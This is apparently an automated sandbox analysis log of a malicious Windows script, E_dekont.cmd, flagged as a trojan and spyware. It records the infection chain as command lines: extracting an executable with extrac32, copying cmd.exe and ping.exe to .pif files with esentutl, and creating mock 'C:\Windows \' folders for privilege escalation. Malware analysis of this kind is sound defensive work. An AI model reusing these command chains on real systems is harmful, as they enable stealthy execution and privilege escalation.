Source: vds.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: VSSVC.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: wbengine.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: WmiApSrv.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: wmpnetwk.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SearchIndexer.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7z.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: classification engine

Classification label: mal100.spre.troj.spyw.expl.evad.winCMD@53/167@363/23

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02AF7FD4 GetDiskFreeSpaceA,

4_2_02AF7FD4

Source: C:\Users\Public\Libraries\wdmvmswJ.pif

12_1_004019F0

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02B06DC8 CoCreateInstance,

4_2_02B06DC8

Source: C:\Users\Public\Libraries\wdmvmswJ.pif

12_1_004019F0

Source: C:\Users\Public\Libraries\wdmvmswJ.pif

Code function: 30_2_1002CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,

30_2_1002CBD0

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

File created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log

Source: C:\Users\user\AppData\Local\Temp\x.exe

File created: C:\Users\Public\Libraries\PNO

Jump to behavior

Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-b2310dff430b0ac5-inf
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Mutant created: \Sessions\1\BaseNamedObjects\YfJ3kkV1qkbw4RSw
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Mutant created: NULL
Source: C:\Windows\System32\alg.exe	Mutant created: \BaseNamedObjects\Global\Multiarch.m0yv-b2310dff430b0ac59ea72c54-b
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1444:120:WilError_03
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-b2310dff430b0ac53d78ffaf-b
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5324:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2216:120:WilError_03

Source: C:\Windows\System32\extrac32.exe

File created: C:\Users\user\AppData\Local\Temp\CAB04912.TMP

Jump to behavior

Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Command line argument: 08A	12_1_00413780
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Command line argument: 08A	30_2_00413780
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Command line argument: 08A	30_2_00413780
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Command line argument: 08A	30_1_00413780

Source: C:\Users\user\AppData\Local\Temp\x.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Windows\System32\extrac32.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: E_dekont.cmd	ReversingLabs: Detection: 44%
Source: E_dekont.cmd	Virustotal: Detection: 46%

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\E_dekont.cmd" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\E_dekont.cmd" "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\wdmvmswJ.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Jwsmvmdw.PIF /o
Source: C:\Windows\SysWOW64\esentutl.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Users\Public\Libraries\wdmvmswJ.pif C:\Users\Public\Libraries\wdmvmswJ.pif
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
Source: unknown	Process created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
Source: unknown	Process created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
Source: C:\Users\Public\alpha.pif	Process created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
Source: unknown	Process created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
Source: unknown	Process created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
Source: unknown	Process created: C:\Users\Public\Libraries\Jwsmvmdw.PIF "C:\Users\Public\Libraries\Jwsmvmdw.PIF"
Source: unknown	Process created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Process created: C:\Users\Public\Libraries\wdmvmswJ.pif C:\Users\Public\Libraries\wdmvmswJ.pif
Source: unknown	Process created: C:\Windows\System32\msdtc.exe C:\Windows\System32\msdtc.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64
Source: unknown	Process created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"
Source: unknown	Process created: C:\Users\Public\Libraries\Jwsmvmdw.PIF "C:\Users\Public\Libraries\Jwsmvmdw.PIF"
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Process created: C:\Users\Public\Libraries\wdmvmswJ.pif C:\Users\Public\Libraries\wdmvmswJ.pif
Source: unknown	Process created: C:\Windows\SysWOW64\perfhost.exe C:\Windows\SysWow64\perfhost.exe
Source: unknown	Process created: C:\Windows\System32\Locator.exe C:\Windows\system32\locator.exe
Source: unknown	Process created: C:\Windows\System32\SensorDataService.exe C:\Windows\System32\SensorDataService.exe
Source: unknown	Process created: C:\Windows\System32\snmptrap.exe C:\Windows\System32\snmptrap.exe
Source: unknown	Process created: C:\Windows\System32\Spectrum.exe C:\Windows\system32\spectrum.exe
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalService -p -s SharedRealitySvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\E_dekont.cmd" "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\wdmvmswJ.cmd" "	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Jwsmvmdw.PIF /o	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Users\Public\Libraries\wdmvmswJ.pif C:\Users\Public\Libraries\wdmvmswJ.pif	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"	Jump to behavior
Source: C:\Users\Public\alpha.pif	Process created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Process created: C:\Users\Public\Libraries\wdmvmswJ.pif C:\Users\Public\Libraries\wdmvmswJ.pif
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Process created: C:\Users\Public\Libraries\wdmvmswJ.pif C:\Users\Public\Libraries\wdmvmswJ.pif

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: url.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: mapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
